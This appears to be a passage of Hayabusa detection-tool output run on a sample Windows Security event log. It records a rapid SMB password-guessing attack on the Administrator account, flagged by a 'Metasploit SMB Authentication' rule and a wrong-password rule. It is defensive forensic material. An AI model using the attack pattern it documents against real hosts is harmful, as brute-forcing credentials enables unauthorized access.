Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QJPIrtk5GBAhsUlR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.417 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 720RHwyXQcxvsJBu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.528 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.606 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GofmHRstuhljMDOL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.606 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wQUQ4INktwXwRkaY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.649 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8WHs5hduf7SmUcLK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.701 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gdo1txjJXiRLbUDH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.745 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.785 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JK8jP3ftKQOyutGe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.785 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DdbEjo88dBJRhrKp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.832 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FZCVkXkwhbuSM654 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.929 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z2mc9WScfBa88rtO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.965 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.011 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Lee7qYLkXQoz8rRh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.011 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.057 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f5g1ZKpZuZU1WRoC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.057 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.108 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h4ST7RrHJxAQHHbn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.108 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GtW1hBHF97YqvN4N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.149 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.189 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xVKlPytPofO9LQBm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.189 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.235 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GOkZ9yjvfL51UYXo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.235 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fAxfxSbRqGO7Dej0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.277 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.313 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: D7XmvDYk6zFLir09 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.313 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.355 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mWcl6CKdSMxd8edZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.355 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SxBQlFZvGBqDdobn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.396 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.435 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AXN94VanwME6q8rc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.435 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.467 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JOj7CZ3stJXePY8b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.467 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.513 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DXjmqxguFGL3f8cV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.513 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qHWmdxnRrMbxrdlN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.560 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.681 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6ROBnjuyHn4FRugk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.681 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.754 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zGxuUxasL680O21l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.754 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.812 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CYoM984EzAkUtBoa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.812 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.857 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0e3ATNpzeeAf6Qax : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.857 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q1A0dGhpVy8kgiRP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.889 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xGgNAKJM5RAt9B5K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.935 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c3DpedXujvQpZnjQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.981 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.019 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BsaSjESaUHbsIxJL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.019 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.062 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ca4dlxyEco3VOapw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.062 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.100 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Z6lJc7DXAOcNZ2G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.100 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Olt5mS7na07VDJE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.144 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oCFeQcUMDTs0ev8v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.185 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.233 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FYmH6CQrizoZ1DAx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.233 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iYtujXkzySwZQFk8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.285 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.327 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KE9v6wzrebvjvDIl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.327 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.365 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 81gmRFFBHI1s4dqi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.365 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C8gHWPDjQM8M3tiQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.409 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: szj4mJvtFV06CuR2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.442 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.493 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ceGEl87hOM0InAAd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.493 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.541 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XRv3C3rRxYXTgckj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.541 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.581 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TaPkJPIQnbL3VyUC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.581 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.618 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LZ7PZAT6hWWHNc29 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.618 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.664 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AJVD4uVhwfLSJ6Ab : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.664 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 